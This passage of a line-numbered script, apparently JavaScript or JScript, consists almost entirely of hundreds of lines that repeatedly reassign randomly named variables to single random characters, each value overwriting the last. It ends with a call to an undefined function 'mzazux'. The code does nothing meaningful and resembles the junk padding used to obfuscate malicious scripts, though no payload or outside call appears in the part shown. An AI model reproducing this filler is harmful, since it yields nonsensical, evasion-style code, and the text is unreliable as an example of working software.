793 | skcfbmcd = "C"; | |
794 | skcfbmcd = "m"; | |
795 | skcfbmcd = "D"; | |
796 | skcfbmcd = "U"; | |
797 | skcfbmcd = "j"; | |
798 | skcfbmcd = "N"; | |
799 | skcfbmcd = "l"; | |
800 | skcfbmcd = "u"; | |
801 | skcfbmcd = "R"; | |
802 | skcfbmcd = "h"; | |
803 | skcfbmcd = "k"; | |
804 | skcfbmcd = "R"; | |
805 | skcfbmcd = "f"; | |
806 | skcfbmcd = "L"; | |
807 | skcfbmcd = "y"; | |
808 | skcfbmcd = "m"; | |
809 | skcfbmcd = "h"; | |
810 | skcfbmcd = "G"; | |
811 | skcfbmcd = "f"; | |
812 | skcfbmcd = "f"; | |
813 | skcfbmcd = "y"; | |
814 | skcfbmcd = "h"; | |
815 | skcfbmcd = "b"; | |
816 | skcfbmcd = "P"; | |
817 | skcfbmcd = "y"; | |
818 | skcfbmcd = "o"; | |
819 | ithgttb = "B"; | |
820 | ithgttb = "x"; | |
821 | ithgttb = "S"; | |
822 | ithgttb = "K"; | |
823 | ithgttb = "a"; | |
824 | ithgttb = "S"; | |
825 | ithgttb = "i"; | |
826 | ithgttb = "z"; | |
827 | ithgttb = "s"; | |
828 | ithgttb = "R"; | |
829 | ithgttb = "r"; | |
830 | ithgttb = "U"; | |
831 | ithgttb = "Q"; | |
832 | ithgttb = "F"; | |
833 | ithgttb = "M"; | |
834 | ithgttb = "l"; | |
835 | ithgttb = "q"; | |
836 | ithgttb = "L"; | |
837 | ithgttb = "Z"; | |
838 | ithgttb = "o"; | |
839 | ithgttb = "\""; | |
840 | dycuqmky = "n"; | |
841 | dycuqmky = "Y"; | |
842 | dycuqmky = "u"; | |
843 | dycuqmky = "T"; | |
844 | dycuqmky = "V"; | |
845 | dycuqmky = "H"; | |
846 | dycuqmky = "d"; | |
847 | dycuqmky = "l"; | |
848 | dycuqmky = "g"; | |
849 | dycuqmky = "o"; | |
850 | dycuqmky = "F"; | |
851 | dycuqmky = "d"; | |
852 | hvnnisr = "K"; | |
853 | hvnnisr = "l"; | |
854 | hvnnisr = "x"; | |
855 | hvnnisr = "U"; | |
856 | hvnnisr = "w"; | |
857 | hvnnisr = "S"; | |
858 | hvnnisr = "W"; | |
859 | hvnnisr = "f"; | |
860 | hvnnisr = "W"; | |
861 | hvnnisr = "u"; | |
862 | hvnnisr = "J"; | |
863 | hvnnisr = "H"; | |
864 | ntovpn = "s"; | |
865 | ntovpn = "Y"; | |
866 | ntovpn = "p"; | |
867 | ntovpn = "u"; | |
868 | ntovpn = "O"; | |
869 | ntovpn = "Z"; | |
870 | ntovpn = "w"; | |
871 | ntovpn = "Q"; | |
872 | ntovpn = "g"; | |
873 | ntovpn = "b"; | |
874 | ntovpn = "E"; | |
875 | ntovpn = "R"; | |
876 | ntovpn = "f"; | |
877 | ntovpn = "y"; | |
878 | ntovpn = "t"; | |
879 | ntovpn = "N"; | |
880 | ntovpn = "X"; | |
881 | ntovpn = "n"; | |
882 | ntovpn = "V"; | |
883 | ntovpn = "l"; | |
884 | ntovpn = "A"; | |
885 | ntovpn = "D"; | |
886 | ntovpn = "c"; | |
887 | ntovpn = "d"; | |
888 | ntovpn = "G"; | |
889 | ntovpn = "D"; | |
890 | ntovpn = "H"; | |
891 | ntovpn = "n"; | |
892 | ntovpn = "h"; | |
893 | ntovpn = "c"; | |
894 | ntovpn = "c"; | |
895 | ntovpn = "d"; | |
896 | ntovpn = "E"; | |
897 | ntovpn = "V"; | |
898 | ntovpn = "o"; | |
899 | ntovpn = "p"; | |
900 | ntovpn = "f"; | |
901 | ntovpn = "g"; | |
902 | ntovpn = "T"; | |
903 | vffbzjg = "l"; | |
904 | vffbzjg = "I"; | |
905 | vffbzjg = "u"; | |
906 | vffbzjg = "I"; | |
907 | vffbzjg = "b"; | |
908 | vffbzjg = "q"; | |
909 | vffbzjg = "z"; | |
910 | vffbzjg = "I"; | |
911 | vffbzjg = "m"; | |
912 | vffbzjg = "P"; | |
913 | vffbzjg = "U"; | |
914 | vffbzjg = "I"; | |
915 | vffbzjg = "e"; | |
916 | vffbzjg = "K"; | |
917 | vffbzjg = "R"; | |
918 | vffbzjg = "Y"; | |
919 | vffbzjg = "Q"; | |
920 | vffbzjg = "h"; | |
921 | vffbzjg = "N"; | |
922 | vffbzjg = "t"; | |
923 | vffbzjg = "O"; | |
924 | vffbzjg = "f"; | |
925 | vffbzjg = "j"; | |
926 | vffbzjg = "t"; | |
927 | vffbzjg = "f"; | |
928 | vffbzjg = "Q"; | |
929 | vffbzjg = "H"; | |
930 | vffbzjg = "k"; | |
931 | vffbzjg = "Q"; | |
932 | vffbzjg = "T"; | |
933 | vffbzjg = "A"; | |
934 | vffbzjg = "w"; | |
935 | vffbzjg = "I"; | |
936 | vffbzjg = "D"; | |
937 | vffbzjg = "x"; | |
938 | rxwpnxoff = "i"; | |
939 | rxwpnxoff = "c"; | |
940 | rxwpnxoff = "P"; | |
941 | rxwpnxoff = "o"; | |
942 | rxwpnxoff = "L"; | |
943 | rxwpnxoff = "P"; | |
944 | rxwpnxoff = "h"; | |
945 | rxwpnxoff = "P"; | |
946 | rxwpnxoff = "1"; | |
947 | tmxbbry = "c"; | |
948 | tmxbbry = "P"; | |
949 | qlfijdv = "Y"; | |
950 | qlfijdv = "N"; | |
951 | qlfijdv = "q"; | |
952 | qlfijdv = "U"; | |
953 | qlfijdv = "e"; | |
954 | qlfijdv = "g"; | |
955 | qlfijdv = "b"; | |
956 | qlfijdv = "X"; | |
957 | qlfijdv = "8"; | |
958 | dbkztimsh = "d"; | |
959 | dbkztimsh = "S"; | |
960 | dbkztimsh = "f"; | |
961 | dbkztimsh = "A"; | |
962 | dbkztimsh = "e"; | |
963 | dbkztimsh = "I"; | |
964 | dbkztimsh = "K"; | |
965 | dbkztimsh = "s"; | |
966 | dbkztimsh = "c"; | |
967 | dbkztimsh = "z"; | |
968 | dbkztimsh = "&"; | |
969 | pszwerlx = "V"; | |
970 | pszwerlx = "H"; | |
971 | pszwerlx = "Y"; | |
972 | pszwerlx = "z"; | |
973 | pszwerlx = "Y"; | |
974 | pszwerlx = "C"; | |
975 | pszwerlx = "B"; | |
976 | pszwerlx = "W"; | |
977 | pszwerlx = "h"; | |
978 | pszwerlx = "c"; | |
979 | pszwerlx = "F"; | |
980 | pszwerlx = "b"; | |
981 | pszwerlx = "Y"; | |
982 | pszwerlx = "a"; | |
983 | pszwerlx = "A"; | |
984 | pszwerlx = "R"; | |
985 | pszwerlx = "Z"; | |
986 | pszwerlx = "y"; | |
987 | pszwerlx = "E"; | |
988 | pszwerlx = "w"; | |
989 | pszwerlx = "d"; | |
990 | pszwerlx = "E"; | |
991 | pszwerlx = "y"; | |
992 | pszwerlx = "y"; | |
993 | pszwerlx = "j"; | |
994 | pszwerlx = "j"; | |
995 | pszwerlx = "d"; | |
996 | pszwerlx = "V"; | |
997 | pszwerlx = "k"; | |
998 | pszwerlx = "H"; | |
999 | pszwerlx = "l"; | |
1000 | pszwerlx = "Y"; | |
1001 | pszwerlx = "o"; | |
1002 | pszwerlx = "M"; | |
1003 | pszwerlx = "x"; | |
1004 | pszwerlx = "O"; | |
1005 | pszwerlx = "A"; | |
1006 | pszwerlx = "i"; | |
1007 | pszwerlx = "i"; | |
1008 | pszwerlx = "z"; | |
1009 | pszwerlx = "7"; | |
1010 | tialf = "z"; | |
1011 | tialf = "Q"; | |
1012 | tialf = "A"; | |
1013 | tialf = "p"; | |
1014 | tialf = "b"; | |
1015 | tialf = "R"; | |
1016 | tialf = "B"; | |
1017 | tialf = "K"; | |
1018 | mlxbxu = "m"; | |
1019 | mlxbxu = "I"; | |
1020 | mlxbxu = "T"; | |
1021 | mlxbxu = "t"; | |
1022 | mlxbxu = "f"; | |
1023 | mlxbxu = "V"; | |
1024 | mlxbxu = "s"; | |
1025 | mlxbxu = "X"; | |
1026 | mlxbxu = "u"; | |
1027 | mlxbxu = "v"; | |
1028 | mlxbxu = "v"; | |
1029 | mlxbxu = "k"; | |
1030 | mlxbxu = "z"; | |
1031 | mlxbxu = "P"; | |
1032 | mlxbxu = "V"; | |
1033 | mlxbxu = "u"; | |
1034 | mlxbxu = "y"; | |
1035 | mlxbxu = "f"; | |
1036 | mlxbxu = "F"; | |
1037 | mlxbxu = "e"; | |
1038 | mlxbxu = "V"; | |
1039 | mlxbxu = "v"; | |
1040 | mlxbxu = "O"; | |
1041 | mlxbxu = "r"; | |
1042 | mlxbxu = "I"; | |
1043 | mlxbxu = "S"; | |
1044 | mlxbxu = "z"; | |
1045 | mlxbxu = "i"; | |
1046 | mlxbxu = "w"; | |
1047 | mlxbxu = "C"; | |
1048 | mlxbxu = "l"; | |
1049 | mlxbxu = "p"; | |
1050 | mlxbxu = "G"; | |
1051 | mlxbxu = "y"; | |
1052 | mlxbxu = "D"; | |
1053 | mlxbxu = "j"; | |
1054 | mlxbxu = "C"; | |
1055 | mlxbxu = "O"; | |
1056 | mlxbxu = "u"; | |
1057 | mlxbxu = "N"; | |
1058 | mlxbxu = "s"; | |
1059 | mlxbxu = "q"; | |
1060 | rsolbz = "Q"; | |
1061 | rsolbz = "o"; | |
1062 | rsolbz = "N"; | |
1063 | rsolbz = "k"; | |
1064 | rsolbz = "Q"; | |
1065 | rsolbz = "F"; | |
1066 | rsolbz = "P"; | |
1067 | rsolbz = "R"; | |
1068 | rsolbz = "t"; | |
1069 | rsolbz = "K"; | |
1070 | rsolbz = "L"; | |
1071 | rsolbz = "e"; | |
1072 | rsolbz = "C"; | |
1073 | rsolbz = "T"; | |
1074 | rsolbz = "h"; | |
1075 | rsolbz = "E"; | |
1076 | rsolbz = "K"; | |
1077 | rsolbz = "q"; | |
1078 | rsolbz = "e"; | |
1079 | rsolbz = "j"; | |
1080 | rsolbz = "."; | |
1081 | vmjomwr = "c"; | |
1082 | vmjomwr = "d"; | |
1083 | vmjomwr = "C"; | |
1084 | vmjomwr = "f"; | |
1085 | vmjomwr = "s"; | |
1086 | vmjomwr = "e"; | |
1087 | zvhqk = "s"; | |
1088 | zvhqk = "c"; | |
1089 | zvhqk = "l"; | |
1090 | zvhqk = "n"; | |
1091 | zvhqk = "C"; | |
1092 | zvhqk = "R"; | |
1093 | zvhqk = "s"; | |
1094 | zvhqk = "Z"; | |
1095 | zvhqk = "V"; | |
1096 | zvhqk = "d"; | |
1097 | zvhqk = "W"; | |
1098 | zvhqk = "c"; | |
1099 | zvhqk = "k"; | |
1100 | zvhqk = "T"; | |
1101 | zvhqk = "G"; | |
1102 | zvhqk = "U"; | |
1103 | kskux = "J"; | |
1104 | kskux = "B"; | |
1105 | kskux = "F"; | |
1106 | kskux = "g"; | |
1107 | kskux = "H"; | |
1108 | kskux = "f"; | |
1109 | kskux = "u"; | |
1110 | kskux = "j"; | |
1111 | kskux = "E"; | |
1112 | kskux = "a"; | |
1113 | kskux = "t"; | |
1114 | kskux = "0"; | |
1115 | sjkxsh = "C"; | |
1116 | sjkxsh = "w"; | |
1117 | sjkxsh = "e"; | |
1118 | sjkxsh = "k"; | |
1119 | sjkxsh = "M"; | |
1120 | sjkxsh = "q"; | |
1121 | sjkxsh = "j"; | |
1122 | sjkxsh = "l"; | |
1123 | iwntcbb = "G"; | |
1124 | iwntcbb = "h"; | |
1125 | iwntcbb = "g"; | |
1126 | iwntcbb = "n"; | |
1127 | iwntcbb = "T"; | |
1128 | iwntcbb = "m"; | |
1129 | iwntcbb = "u"; | |
1130 | iwntcbb = "t"; | |
1131 | iwntcbb = "D"; | |
1132 | iwntcbb = "j"; | |
1133 | iwntcbb = "j"; | |
1134 | iwntcbb = "r"; | |
1135 | iwntcbb = "G"; | |
1136 | iwntcbb = "i"; | |
1137 | iwntcbb = "V"; | |
1138 | iwntcbb = "E"; | |
1139 | unlshe = "r"; | |
1140 | unlshe = "Q"; | |
1141 | unlshe = "e"; | |
1142 | unlshe = "B"; | |
1143 | unlshe = "g"; | |
1144 | unlshe = "u"; | |
1145 | unlshe = "M"; | |
1146 | unlshe = "V"; | |
1147 | unlshe = "U"; | |
1148 | unlshe = "e"; | |
1149 | unlshe = "n"; | |
1150 | unlshe = "s"; | |
1151 | unlshe = "T"; | |
1152 | unlshe = "F"; | |
1153 | unlshe = "Z"; | |
1154 | unlshe = "H"; | |
1155 | unlshe = "w"; | |
1156 | unlshe = "S"; | |
1157 | unlshe = "j"; | |
1158 | unlshe = "S"; | |
1159 | unlshe = "x"; | |
1160 | unlshe = "M"; | |
1161 | unlshe = "i"; | |
1162 | unlshe = "E"; | |
1163 | unlshe = "d"; | |
1164 | unlshe = "x"; | |
1165 | unlshe = "E"; | |
1166 | unlshe = "c"; | |
1167 | unlshe = "R"; | |
1168 | unlshe = "b"; | |
1169 | unlshe = "X"; | |
1170 | unlshe = "h"; | |
1171 | unlshe = "W"; | |
1172 | unlshe = "g"; | |
1173 | unlshe = "r"; | |
1174 | unlshe = "U"; | |
1175 | unlshe = "O"; | |
1176 | unlshe = "Z"; | |
1177 | unlshe = "M"; | |
1178 | unlshe = "d"; | |
1179 | unlshe = "Q"; | |
1180 | unlshe = "y"; | |
1181 | unlshe = "c"; | |
1182 | unlshe = "C"; | |
1183 | uyovujnr = "s"; | |
1184 | uyovujnr = "c"; | |
1185 | uyovujnr = "l"; | |
1186 | uyovujnr = "o"; | |
1187 | uyovujnr = "i"; | |
1188 | uyovujnr = "v"; | |
1189 | pzigzedtr = "A"; | |
1190 | pzigzedtr = "n"; | |
1191 | pzigzedtr = "v"; | |
1192 | pzigzedtr = "T"; | |
1193 | pzigzedtr = "a"; | |
1194 | pzigzedtr = "k"; | |
1195 | pzigzedtr = "q"; | |
1196 | pzigzedtr = "c"; | |
1197 | pzigzedtr = "L"; | |
1198 | pzigzedtr = "Z"; | |
1199 | pzigzedtr = "w"; | |
1200 | pzigzedtr = "S"; | |
1201 | pzigzedtr = "d"; | |
1202 | pzigzedtr = "i"; | |
1203 | pzigzedtr = "U"; | |
1204 | pzigzedtr = "G"; | |
1205 | pzigzedtr = "s"; | |
1206 | pzigzedtr = "K"; | |
1207 | pzigzedtr = "e"; | |
1208 | pzigzedtr = "v"; | |
1209 | pzigzedtr = "W"; | |
1210 | pzigzedtr = "V"; | |
1211 | pzigzedtr = "r"; | |
1212 | pzigzedtr = "F"; | |
1213 | pzigzedtr = "R"; | |
1214 | pzigzedtr = "f"; | |
1215 | pzigzedtr = "Z"; | |
1216 | pzigzedtr = "H"; | |
1217 | pzigzedtr = "o"; | |
1218 | pzigzedtr = "I"; | |
1219 | pzigzedtr = "C"; | |
1220 | pzigzedtr = "E"; | |
1221 | pzigzedtr = "O"; | |
1222 | pzigzedtr = "l"; | |
1223 | pzigzedtr = "Q"; | |
1224 | pzigzedtr = "w"; | |
1225 | mzipsg = "N"; | |
1226 | mzipsg = "N"; | |
1227 | mzipsg = "e"; | |
1228 | mzipsg = "z"; | |
1229 | mzipsg = "h"; | |
1230 | mzipsg = "Z"; | |
1231 | mzipsg = "j"; | |
1232 | mzipsg = "U"; | |
1233 | mzipsg = "s"; | |
1234 | mzipsg = "b"; | |
1235 | mzipsg = "c"; | |
1236 | mzipsg = "D"; | |
1237 | mzipsg = "K"; | |
1238 | mzipsg = "W"; | |
1239 | mzipsg = "M"; | |
1240 | mzipsg = "q"; | |
1241 | mzipsg = "r"; | |
1242 | mzipsg = "I"; | |
1243 | mzipsg = "b"; | |
1244 | mzipsg = "K"; | |
1245 | mzipsg = "j"; | |
1246 | mzipsg = "f"; | |
1247 | mzipsg = "G"; | |
1248 | mzipsg = "k"; | |
1249 | mzipsg = "o"; | |
1250 | mzipsg = "Q"; | |
1251 | mzipsg = "a"; | |
1252 | jaonxyc = "k"; | |
1253 | jaonxyc = "X"; | |
1254 | jaonxyc = "R"; | |
1255 | jaonxyc = "N"; | |
1256 | jaonxyc = "n"; | |
1257 | jaonxyc = "D"; | |
1258 | jaonxyc = "N"; | |
1259 | jaonxyc = "t"; | |
1260 | jaonxyc = "I"; | |
1261 | jaonxyc = "j"; | |
1262 | jaonxyc = "M"; | |
1263 | jaonxyc = "X"; | |
1264 | jaonxyc = "T"; | |
1265 | jaonxyc = "v"; | |
1266 | jaonxyc = "v"; | |
1267 | jaonxyc = "O"; | |
1268 | jaonxyc = "p"; | |
1269 | jaonxyc = "V"; | |
1270 | jaonxyc = "T"; | |
1271 | jaonxyc = "T"; | |
1272 | jaonxyc = "K"; | |
1273 | jaonxyc = "V"; | |
1274 | jaonxyc = "m"; | |
1275 | jaonxyc = "r"; | |
1276 | jaonxyc = "M"; | |
1277 | jaonxyc = "d"; | |
1278 | jaonxyc = "M"; | |
1279 | jaonxyc = "s"; | |
1280 | jaonxyc = "X"; | |
1281 | jaonxyc = "R"; | |
1282 | jaonxyc = "s"; | |
1283 | jaonxyc = "w"; | |
1284 | jaonxyc = "a"; | |
1285 | jaonxyc = "K"; | |
1286 | jaonxyc = "p"; | |
1287 | jaonxyc = "T"; | |
1288 | jaonxyc = "Y"; | |
1289 | jaonxyc = "5"; | |
1290 | ivkmsjr = "c"; | |
1291 | ivkmsjr = "T"; | |
1292 | ivkmsjr = "M"; | |
1293 | ivkmsjr = "e"; | |
1294 | ivkmsjr = "q"; | |
1295 | ivkmsjr = "v"; | |
1296 | ivkmsjr = "B"; | |
1297 | ivkmsjr = "R"; | |
1298 | ivkmsjr = "g"; | |
1299 | ivkmsjr = "k"; | |
1300 | ivkmsjr = "l"; | |
1301 | ivkmsjr = "v"; | |
1302 | ivkmsjr = "f"; | |
1303 | ivkmsjr = "t"; | |
1304 | ivkmsjr = "u"; | |
1305 | ivkmsjr = "n"; | |
1306 | ivkmsjr = "a"; | |
1307 | ivkmsjr = "J"; | |
1308 | ivkmsjr = "P"; | |
1309 | ivkmsjr = "r"; | |
1310 | ivkmsjr = "I"; | |
1311 | ivkmsjr = "d"; | |
1312 | ivkmsjr = "K"; | |
1313 | ivkmsjr = "E"; | |
1314 | ivkmsjr = "q"; | |
1315 | ivkmsjr = "N"; | |
1316 | ivkmsjr = "F"; | |
1317 | ivkmsjr = "F"; | |
1318 | mzazux ( ); |
|